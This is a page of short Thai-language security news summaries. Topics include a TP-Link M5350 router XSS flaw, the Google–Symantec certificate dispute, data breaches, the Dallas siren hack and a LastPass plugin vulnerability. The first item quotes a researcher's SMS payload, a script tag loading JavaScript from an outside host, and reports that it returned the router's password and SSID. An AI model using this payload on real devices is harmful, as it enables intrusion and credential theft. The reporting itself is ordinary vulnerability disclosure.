Tags:
Node Thumbnail

Jan Hörsch จากบริษัท Securai รายงานช่องโหว่ของเราท์เตอร์ 3G ของ TP-Link รุ่น M5350 ที่มีช่องโหว่ cross-site scripting (XSS) เปิดทางให้แฮกเกอร์สามารถยิงโค้ดจาวาสคริปต์ขึ้นไปรันได้

นักวิจัยทดสอบด้วยการยิง SMS <script src=//n.ms/a.j></script> เพื่อให้เราท์เตอร์นำโค้ดขึ้นไปรัน จากนั้นตัวสตริปต์จะส่ง SMS กลับมาเป็นรหัสผ่านและ SSID ของตัวเราท์เตอร์

เฟิร์มแวร์ที่พบช่องโหว่ออกมาตั้งแต่มกราคม 2015 รายงานครั้งเดียวกัน Hörsch ยังระบุถึงสินค้าตัวอื่นๆ เช่น Panasonic Retinascanner ที่มีช่องโหว่ในหน้าเว็บ และผู้ผลิตระบุเพียงว่าสินค้าเลิกผลิตและหมดอายุซัพพอร์ตไปแล้ว

Tags:
Node Thumbnail

NIST เปิดตัวมาตรการการเข้ารหัสแบบรักษาฟอร์แมตข้อมูล (Format-Preserving Encryption - FPE) มาตั้งแต่ปีที่แล้ว ตอนนี้ทาง HPE ประกาศว่าโซลูชั่น SecureData ของบริษัทเป็นโซลูชั่นแรกที่ได้รับการรับรอง (validated) ตามมาตรฐานนี้

HPE SecureData with Hyper FPE ใช้กระบวนวิธีเข้ารหัสแบบ AES-FF1 เป็นหนึ่งในสามกระบวนวิธีที่มาตรฐานของ NIST รับรองให้ใช้งาน

ทาง HPE ระบุว่าบริษัทได้รับการรับรองจาก NIST ตั้งแต่วันที่ 13 เมษายนที่ผ่านมา ผมเองตรวจสอบรายชื่อในเว็บของ NIST ยังไม่พบ แต่หากไม่มีอะไรผิดพลาดก็น่าจะมีรายการสินค้าที่ได้รับการรับรองเร็วๆ นี้

Tags:
Node Thumbnail

Elena Kovakina พนักงานในทีมความปลอดภัย Android ของกูเกิล ไปพูดที่งานสัมมนาของ Kaspersky เล่าว่ากูเกิลเก็บรวบรวม ransomware บน Android กว่า 50,000 ตัวอย่าง (คิดเป็น 30 ตระกูลมัลแวร์) เพื่อนำไปศึกษาพฤติกรรมของมันว่าทำงานอย่างไร

สิ่งที่กูเกิลสนใจคือ ransomware เหล่านี้มีพฤติกรรมอย่างไร เจาะเข้ามาทาง API ตัวไหน เพื่อว่ากูเกิลจะได้อุดช่องโหว่เหล่านั้น และที่ผ่านมา ระบบความปลอดภัยของ Android ก็พัฒนาขึ้นเพราะการศึกษามัลแวร์เหล่านี้ด้วย

Elena บอกว่าเป้าหมายของกูเกิลคือทำให้ต้นทุนการพัฒนามัลแวร์มีราคาแพงขึ้น ทำได้ยากขึ้น (making malware for Android should be hard) เพื่อลดแรงจูงใจของแฮ็กเกอร์ผู้สร้างมัลแวร์ลง เนื่องจากไม่คุ้มค่าเหนื่อย

Tags:
Node Thumbnail

ระบบการออกใบรับรองการเข้ารหัสเว็บทุกวันนี้ ความน่ากลัวอย่างหนึ่งคือเมื่อมี root CA เพิ่มเข้ามาแล้ว root CA นั้นจะออกใบรับรองให้กับโดเมนใดๆ ก็ได้ ทั้งที่จริงๆ แล้วฟีเจอร์หนึ่งของใบรับรองสำหรับ CA คือ Name Constraints สามารถกำหนดโดเมนที่ CA จะออกโดเมนได้แต่ก็ไม่มีใครสนใจใช้งานจริงจังนัก

Tags:
Node Thumbnail

SWIFT ผู้ให้บริการระบบส่งข้อความระหว่างธนาคาร ซึ่งปัจจุบันระบบนี้ถูกใช้เพื่อโอนเงินนับล้านล้านดอลลาร์ต่อวัน เตรียมเปิดตัวเครื่องมือใหม่เพื่อตรวจจับข้อความหลอกลวง เพื่อเรียกคืนความเชื่อมั่น หลังจากที่มีข่าวธนาคารถูกโจมตีผ่านระบบและเงินหายไปนับล้านดอลลาร์

ระบบใหม่ของ SWIFT จะมีการเรียนรู้แพทเทิร์นการส่งข้อความของธนาคารผู้ใช้งานระบบดังกล่าว ดังนั้นตัวระบบสามารถตรวจจับได้ทันทีเมื่อพบเห็นสิ่งที่ผิดปกติ

Tags:
Node Thumbnail

Project Zero ของกูเกิลเขียนรายงานการเจาะเฟิร์มแวร์ Broadcom Wi-Fi SoC ที่ใช้งานอยู่ใน Nexus 6P แสดงให้เห็นว่าแฮกเกอร์สามารถแฮกเครื่องจากระยะไกล ด้วยการสร้างแพ็กเก็ต Wi-Fi เพื่อเจาะทะลุตัวเฟิร์มแวร์ เมื่อควบคุมตัวเฟิร์มแวร์ของชิป Wi-Fi ได้แล้วจึงเจาะทะลุเข้าเคอร์เนลอีกชั้นหนึ่ง ทำให้เข้าควบคุมเครื่องของเหยื่อได้อย่างสมบูรณ์

ช่องโหว่นี้ถูกแก้ไขแล้วในอัพเดตเดือนเมษายนที่ผ่านมา (สำหรับ Nexus ที่ยังซัพพอร์ตอยู่เท่านั้น)

Tags:
Node Thumbnail

Wonga ผู้ให้บริการกู้เงินระยะสั้นได้ประกาศว่า ทางบริษัทถูกแฮกเว็บไซต์และพบว่ามีข้อมูลที่รั่วไหลออกมาเป็นจำนวนมาก กระทบกับผู้ใช้กว่า 245,000 คนในสหราชอาณาจักร และ 25,000 คนในโปแลนด์ ซึ่งตอนนี้ได้ส่งอีเมลแจ้งเตือนผู้ใช้ที่มีความเสี่ยงที่จะถูกขโมยข้อมูล รวมถึงขึ้นข้อมูลในเว็บไซต์เพื่อประกาศการถูกแฮกข้อมูลแล้ว

สำหรับข้อมูลที่หลุดจากเว็บไซต์ Wonga ก็มีทั้งชื่อ, ที่อยู่อีเมล, ที่อยู่บ้าน, เบอร์โทรศัพท์, รหัส 4 ตัวท้ายของบัตร, เลขบัญชีธนาคาร และ sort code ซึ่งตอนนี้ Wonga เชื่อว่ารหัสผ่านไม่น่าจะหลุดไปด้วย แต่ก็แจ้งเตือนให้ผู้ใช้รีบเปลี่ยนรหัสทันที และเตือนว่าผู้ใช้ที่ตกอยู่ในความเสี่ยงนั้นควรจะระมัดระวังตัว รวมถึงแจ้งเรื่องดังกล่าวไปยังธนาคารแล้วเช่นกัน

Tags:
Topics: 
Node Thumbnail

ความปลอดภัยไซเบอร์เริ่มเข้าไปเกี่ยวข้องกับระบบควบคุมมากขึ้นเรื่อยๆ เช่น ระบบควบคุมโครงการพื้นฐานอย่างไฟฟ้าและประปา ล่าสุดการระบบเตือนภัยเมืองดัลลัสก็ตกเป็นเหยื่อของการบุกรุกไซเบอร์ เมื่อระบบถูกแฮกจนไซเรน 156 ตัวสำหรับการแจ้งเตือนทอร์นาโดดังขึ้นพร้อมกันทั่วเมือง

ทางโฆษกระบุว่ายังไม่สามารถให้รายละเอียดได้ แต่บอกเพียงว่าระบบถูกแฮกตั้งแต่วันศุกร์ที่ผ่านมา และกำลังทำงานร่วมกับหน่วยงานอื่น เช่น FCC เพื่อหาต้นตอของการบุกรุกต่อไป

ไซเรนดังขึ้นช่วงก่อนเที่ยงคืน และเจ้าหน้าที่ปิดไซเรนได้สำเร็จหลังตีหนึ่ง โดยต้องปิดระบบแจ้งเตือนทั้งระบบ ตอนนี้เจ้าหน้าที่กำลังหาทางเปิดระบบแจ้งเตือนให้กลับมาทำงานอีกครั้ง

Tags:
Node Thumbnail

หลังจาก Blognone เคยนำเสนอรายงานสำรวจการเปิดใช้งาน HTTPS ในไทย ประจำปีปี 2016 ไป ขณะนี้ผ่านมาหนึ่งปีกว่าๆ แล้ว ก็สมควรถึงเวลาที่จะสำรวจติดตามผลกันอีกครั้ง

รอบนี้เราขยายจำนวนเว็บที่สนใจให้มากขึ้นกว่าเดิม แต่ยังคงตามติดเว็บเดิมที่เคยสำรวจไว้อย่างครบถ้วนครับ

Tags:
Node Thumbnail

เมื่อเดือนกันยายนปีที่แล้ว อินเทลประกาศขายหุ้น 51% ใน Intel Security ให้กับบริษัทลงทุน TPG ส่งผลให้ Intel Security หรือ McAfee เดิม ไม่ได้มีสถานะเป็นบริษัทลูกของอินเทลอีกต่อไป (แต่อินเทลยังถือหุ้นอยู่ 49%)

วันนี้กระบวนการเปลี่ยนผ่านเสร็จสิ้นแล้ว ส่งผลให้ McAfee กลับมาเกิดใหม่อีกครั้งในฐานะบริษัทอิสระ (standalone company) โดยมีชื่ออย่างเป็นทางการว่า McAfee, LLC

ผลิตภัณฑ์และบริการทั้งหมดของ McAfee ยังเหมือนเดิม สิ่งที่ต่างไปคือโลโก้ใหม่ ยังเป็นรูปโล่สีแดงคล้ายของเดิม แต่เปลี่ยนจากโล่ทรงโค้งมีโลโก้รูปตัว M มาเป็นโล่ทรงเหลี่ยมที่ดูเป็นอักษร M แทน

Tags:
Node Thumbnail

IBM Security ออกรายงานสรุปสถานการณ์ความปลอดภัยของปี 2016 ผลพบว่าการเติบโตของข้อมูลหลุด (data breach) เพิ่มสูงเป็นประวัติการณ์ จำนวนข้อมูลที่ถูกเจาะออกมาเผยแพร่เพิ่มจาก 600 ล้านรายการในปี 2015 มาเป็น 4 พันล้านรายการในปี 2016 (โตถึง 566% ภายในปีเดียว)

ข้อมูลที่ถูกเจาะมีทั้งข้อมูลแบบเดิมๆ อย่างรหัสผ่าน เลขบัตรเครดิต ข้อมูลสุขภาพ แต่อาชญากรไซเบอร์ก็หันมาเจาะข้อมูลประเภทใหม่ๆ เช่น บันทึกอีเมลเก่าๆ เอกสารทางธุรกิจ ทรัพย์สินทางปัญญา และซอร์สโค้ดของซอฟต์แวร์ที่ใช้ภายในองค์กรด้วย

Tags:
Node Thumbnail

บริษัทประกันภัย AIG หันมาเปิดบริการประกันภัยไซเบอร์ ครอบคลุมตั้งแต่การคุกคามออนไลน์ (online bully) การขู่เรียกเงินค่าไถ่ ไปจนถึงภัยไซเบอร์แบบอื่นๆ

บริการ Family CyberEdge เปิดให้กับลูกค้าระดับสูง (Private Client Group) เท่านั้น โดยบริการลูกค้ากลุ่มนี้มักมีบริการเฉพาะ เช่น การประกันไวน์หรืองานศิลปะมูลค่าสูงๆ

นอกจากการประกันความเสียหายแล้ว บริการนี้ยังเข้าตรวจสอบอุปกรณ์อิเล็กทรอนิกส์ในบ้าน, มอนิเตอร์ความปลอดภัย, และรวมค่าบริการในการกู้คืนข้อมูล

บริษัทประกันที่เปิดกรมธรรม์สำหรับภัยไซเบอร์นั้นมีมาก่อนหน้านี้แล้ว เช่น Munich Re CyberOne ที่คุ้มครองความเสียหายตั้งแต่ 25,000 ถึง 50,000 ดอลลาร์ต่อเบี้ยประกัน 100 ดอลลาร์

Tags:
Node Thumbnail

พบกันเป็นประจำทุกต้นเดือนครับ กูเกิลออกแพตช์ความปลอดภัย Android ประจำเดือนเมษายน 2017 รอบนี้แพตช์มี 2 ชุด ได้แก่ชุด 1 เม.ย. สำหรับพาร์ทเนอร์ที่ต้องการอุดช่องโหว่ก่อน และชุด 5 เม.ย. ที่เป็นแพตช์ชุดสมบูรณ์ (แพตช์ตัวนี้จะรวมเอาแพตช์ 1 เม.ย. มาด้วย)

สำหรับแพตช์ 1 เม.ย. แก้ช่องโหว่ด้านความปลอดภัย 23 จุด (CVE) เป็นระดับร้ายแรง (critical) 6 จุด ส่วนแพตช์ 5 เม.ย. แก้เพิ่มอีก 79 จุด ส่วนมากแก้ปัญหาช่องโหว่บนไดรเวอร์ของผู้ผลิตฮาร์ดแวร์อย่าง Qualcomm, Broadcom, MediaTek, Synaptics และ NVIDIA

ผลิตภัณฑ์ในกลุ่ม Pixel/Nexus ที่ได้รับแพตช์ จะมีดังนี้ครับ

Tags:
Node Thumbnail

Rafael Scheel นักวิจัยจาก Oneconsult AG รายงานถึงความเสี่ยงของสมาร์ตทีวีที่สามารถเชื่อมต่ออินเทอร์เน็ตได้ ว่าอาจจะถูกแฮกผ่านข้อมูลสัญญาณทีวีโดยตรง ทำให้ผู้ใช้สมาร์ตทีวีที่ไม่ได้เปิดเว็บเองก็ถูกแฮกได้ โดยมีสมาร์ตทีวีที่เข้าข่ายมีความเสี่ยงถึง 85%

Scheel อาศัยโปรโตคอล HbbTV ที่เปิดทางให้ทีวีสามารถหลอมรวมกับคอนเทนต์แบบอื่นๆ เช่น เว็บ ทำให้สามารถส่งข้อมูลทางคลื่น DVB-T สำหรับดิจิตอลทีวีเพื่อกระตุ้นให้ทีวีไปเปิดเว็บที่มุ่งร้ายโดยผู้ใช้ไม่รู้ตัวได้

เมื่อเปิดเว็บที่มุ่งร้ายแล้ว แฮกเกอร์จะเข้าถึงสิทธิ์ root ของตัวทีวี สามารถใช้ทีวีเป็น botnet หรือดักจับข้อมูลพฤติกรรมของผู้ใช้ได้

ที่มา - The Hackers News

Tags:
Node Thumbnail

กรณีปัญหาระหว่างกูเกิลกับไซแมนเทคเกี่ยวกับการออกใบรับรองดิจิตอลที่ไม่เป็นไปตามมาตรฐานมาเป็นเวลานาน (ทั้งที่ออกโดยไซแมนเทคเองและที่ออกโดย (อดีต) ตัวแทนของไซแมนเทค) ซึ่งทำให้กูเกิลได้เตรียมมาตรการเพื่อปกป้องผู้ใช้งานเว็บเบราว์เซอร์ Chrome เอาไว้แล้วนั้น ได้พบว่าการยกเลิกการโชว์สถานะ EV หรือที่เรียกกันว่าแถบ Green Bar ซึ่งเป็นหนึ่งในมาตรการที่กูเกิลได้เตรียมที่จะนำมาใช้นั้นเหมือนจะได้มีผลบังคับใช้ไปแล้วทั้งที่ยังไม่ถึงกำหนดเวลา โดยเฉพาะ

Tags:
Topics: 
Node Thumbnail

แอปเปิลอัพเดตเอกสาร iOS Security อธิบายกระบวนการรักษาความมั่นคงปลอดภัยของตัว iOS เองและอุปกรณ์ที่มาเชื่อมต่อรอบข้าง สำหรับผู้ใช้ที่ต้องการรู้ว่าแอปเปิลมีมาตรการรักษาความปลอดภัยข้อมูลและความปลอดภัยผู้ใช้อย่างไรบ้าง

แม้เอกสารไม่ได้ลงรายละเอียดลึก แต่ก็ละเอียดพอที่จะแสดงให้เห็นว่าแอปเปิลทำตามกระบวนการที่ดี (best practice) อย่างไรบ้าง เช่น อุปกรณ์ HomeKit จะสร้างคู่กุญแจใหม่ทุกครั้งที่รีเซ็ตเครื่อง และการเชื่อมต่อกับอุปกรณ์ iOS ใช้การเข้ารหัสแบบ ChaCha20-Poly1305 สำหรับการใช้ TouchID ที่เปิดให้แอปทั่วไปใช้งานได้จะประมวลผลข้อมูลลายนิ้วมือใน Secure Enclave เสมอโดยตัวซีพียูหลักไม่สามารถอ่านข้อมูลได้

Tags:
Node Thumbnail

หลังจากกูเกิลประกาศเตรียมลดระดับความเชื่อถือของหน่วยงานออกใบรับรองจากไซแมนเทคทั้งหมด ให้สามารถออกใบรับรองได้ไม่เกินเพียง 9 เดือนและไม่สามารถออกใบรับรองระดับ EV ได้อีกต่อไป คำถามหนึ่งคือใบรับรองที่ออกผิดพลาดทั้งหมดเป็นเท่าใด เพราะกูเกิลอ้างว่ามีใบรับรองผิดพลาดถึง 30,000 ใบ แต่ไซแมนเทคยืนยันว่ามีเพียง 127 ใบเท่านั้น

กูเกิลชี้แจงเพิ่มเติมว่าใบรับรองที่ออกผิดพลาด ออกโดยหน่วยงานภายนอกที่ไซแมคเทคอนุญาตให้ตรวจสอบความเป็นเจ้าของโดเมนก่อนออกใบรับรอง (registration authority - RA) แทนไซแมนเทค แม้ข้อกำหนด CA/Browser Forum จะอนุญาตแต่ก็ระบุว่า root CA ต้องรับผิดชอบผลทั้งหมดหากมีความผิดพลาดกับ RA เหล่านี้

Tags:
Node Thumbnail

นักวิจัยด้านความปลอดภัย Kevin Beaumont ได้ค้นพบว่าที่หน้าเว็บไซต์ Docs.com ซึ่งเป็นเว็บไซต์ที่ใช้แสดงตัวอย่างของฟีเจอร์และการใช้งานบริการ Office 365 มีฟังก์ชันค้นหาที่เมื่อทำการค้นหาด้วยคีย์เวิร์ดเฉพาะบางอย่างแล้ว จะทำให้เขาสามารถเข้าถึงไฟล์เอกสารของผู้ใช้งานอื่นได้

Tags:
Node Thumbnail

กูเกิลออกรายงาน Android Security 2016 Year in Review สรุปสถานการณ์ความปลอดภัยของ Android ตลอดทั้งปี 2016 ว่าเกิดอะไรขึ้นบ้าง

ในภาพรวม มาตรการต่างๆ ที่กูเกิลนำมาช่วยกรองไม่ให้ผู้ใช้ติดมัลแวร์ได้ผลดี อัตราการติดมัลแวร์ลดจำนวนลงจากในปี 2015 แต่อัตราการอัพเดตแพตช์ความปลอดภัยของผู้ผลิตฮาร์ดแวร์ต่างๆ ยังไม่ดีนัก กูเกิลก็พยายามเลี่ยงข้อมูลนี้โดยไม่เผยข้อมูลอุปกรณ์ที่ได้แพตช์ "ล่าสุด" (บอกอ้อมๆ ว่า "เคยได้แพตช์อย่างน้อยหนึ่งครั้งในปี 2016") แต่ในภาพรวมก็ถือว่าดีขึ้นจากปี 2015

Tags:
Node Thumbnail

ประเด็นความขัดแย้งระหว่างกูเกิลและไซแมนเทค ที่กูเกิลระบุว่าไซแมนเทคออกใบรับรองผิดพลาดจำนวนมาก ตอนนี้ยังไม่แน่ชัดว่ากูเกิลจะตัดสินใจแบนไซแมนเทคจากการออกใบรับรองแบบ Extended Validation (EV) เมื่อใด

ใบรับรอง EV ช่วยยืนยันตัวหน่วยงานว่าเป็นองค์กรที่มีตัวตนอยู่จริง ดำเนินการในประเทศที่ระบุจริง เบราว์เซอร์จะช่วยแสดงผล green bar ด้วยการแสดงชื่อองค์กรพร้อมกับประเทศที่องค์กรเหล่านั้นตั้งอยู่ ทำให้กระบวนการหลอกผู้ใช้ (phishing) ลดความเสี่ยงลง

Tags:
Node Thumbnail

สัปดาห์ที่ผ่านมา มีแฮ็กเกอร์กลุ่มหนึ่งชื่อ Turkish Crime Family ที่อาศัยอยู่ในลอนดอน อ้างว่าได้บัญชี iCloud จำนวน 250 ล้านบัญชี และเรียกค่าไถ่จากแอปเปิลเพื่อแลกกับการไม่เปิดเผยข้อมูลก้อนนี้ ฝั่งของแอปเปิลตอบโต้ว่าตัวเองไม่ได้โดนแฮ็ก และข้อมูลก้อนนี้มาจากบริษัทอื่นที่โดนแฮ็กแทน

ฝั่งแฮ็กเกอร์ยืนยันว่าข้อมูลก้อนนี้ไม่ได้มาจากการแฮ็กระบบของแอปเปิล แต่ข้อมูลนี้เป็นของจริง และจะเปิดเผยถ้าแอปเปิลไม่ยอมจ่ายเงินภายในวันที่ 7 เมษายนนี้ ทางเว็บไซต์ ZDNet จึงติดต่อไปยังแฮ็กเกอร์เพื่อขอตัวอย่างข้อมูลมา 54 บัญชี

Tags:
Node Thumbnail

CERT หน่วยงานแจ้งเตือนช่องโหว่ความปลอดภัยซอฟต์แวร์ภายใต้สถาบันวิศวกรรมซอฟต์แวร์ (Software Engineering Institute - SEI) ประกาศปล่อยมาตรฐานการเขียนโค้ดให้ปลอดภัยสำหรับภาษา C++ ที่รวมกฎ 83 รายการสำหรับการเขียนโค้ดให้ปลอดภัย หลังจากก่อนหน้านี้ทาง CERT เคยปล่อยคู่มือสำหรับ ภาษา C, ภาษาจาวา, ภาษา Perl, และการเขียนแอปบนแอนดรอยด์

กฎบางข้อจะตรงกันหลายภาษาเช่นเช็คอินพุตว่าปิดท้ายสตริงด้วย null เสมอ แต่บางข้อก็จะค่อนข้างเฉพาะเช่นการใช้ lambda ในภาษา C++14

ทุกกฎมีตัวอย่างโค้ดที่มักเขียนผิดให้ แม้จะค่อนข้างยาวแต่ก็อ่านไม่ยากนัก ผู้สนใจน่าลองไล่จากต้นจนจบกัน

Tags:
Node Thumbnail

หลังจากเมื่อวานนี้กูเกิลออกมาระบุว่าไซแมนเทคและหน่วยงานออกใบรับรองในเครือ ได้ออกใบรับรองผิดพลาดรวมกว่า 30,000 ใบ ตอนนี้ทางฝั่งไซแมนเทคก็ออกมาโต้ตอบว่าการเขียนข้อความของกูเกิลเป็นการระบุปัญหาใหญ่เกินจริง และใบรับรองที่ออกผิดพลาดมีทั้งหมด 127 ใบ ไม่ใช่ 30,000 ใบ

ไซแมนเทคระบุว่าบริษัทได้ดำเนินการแก้ไขปัญหามาอย่างต่อเนื่อง ทั้งการยกเลิกหน่วยงานรับลงทะเบียน (registration authority - RA) และเดินหน้าปรับปรุงความปลอดภัยของกระบวนการออกใบรับรอง และหน่วยงานออกใบรับรองขนาดใหญ่ก็ล้วนมีการออกใบรับรองผิดพลาดบ้างทั้งสิ้น แต่กูเกิลเลือกโจมตีไซแมนเทคบริษัทเดียว

Tags:
Node Thumbnail

เมื่อเดือนมกราคมที่ผ่านมามีรายงานใบรับรองจาก Symantec ที่ออกโดยไม่ได้รับอนุญาตรวม 108 ใบ ล่าสุดกูเกิลออกมารายงานว่าการสอบสวนขยายผลไปจนพบว่ามีใบรับรองที่ออกโดยไม่ได้รับอนุญาตอย่างน้อย 30,000 ใบ และตอนนี้กูเกิลเตรียมประกาศบทลงโทษด้วยการบีบอายุใบรับรองจาก Symantec ซึ่งรวมถึง GeoTrust และ Thawe ทั้งหมดเหลือไม่เกิน 9 เดือน (279 วัน)

Tags:
Node Thumbnail

Tavis Ormandy จาก Project Zero รายงานช่องโหว่ของปลั๊กอิน LastPass ที่ใช้เติมรหัสผ่านให้กับเว็บเบราว์เซอร์ ที่เปิดทางให้เว็บ lastpass.com เชื่อมต่อข้อมูลกับตัวปลั๊กอินได้ แต่กระบวนการมีช่องโหว่ทำให้เว็บใดๆ สามารถเข้าถึงตัวปลั๊กอินได้ทั้งหมด หากติดตั้ง LastPass Binary Component ไว้ด้วยก็จะเสียหายถึงขั้นแฮกเกอร์เรียกโปรแกรมใดๆ ในสิทธิ์ของผู้ใช้ได้

ทาง LastPass ได้รับรายงานจากกูเกิลตั้งแต่วันที 20 มีนาคมที่ผ่านมา และตอนนี้ออกแพตช์แก้ปัญหาเรียบร้อยแล้ว หากใครกังวล สามารถเช็คเวอร์ชั่นของส่วนเสริมได้ ตามเบราว์เซอร์ ได้แก่ Firefox ใช้รุ่น 4.1.36, Chrome ใช้รุ่น 4.1.43, Edge ใช้รุ่น 4.1.30 (รออนุมัติ), Opera ใช้รุ่น 4.1.28 (รออนุมัติ)

Pages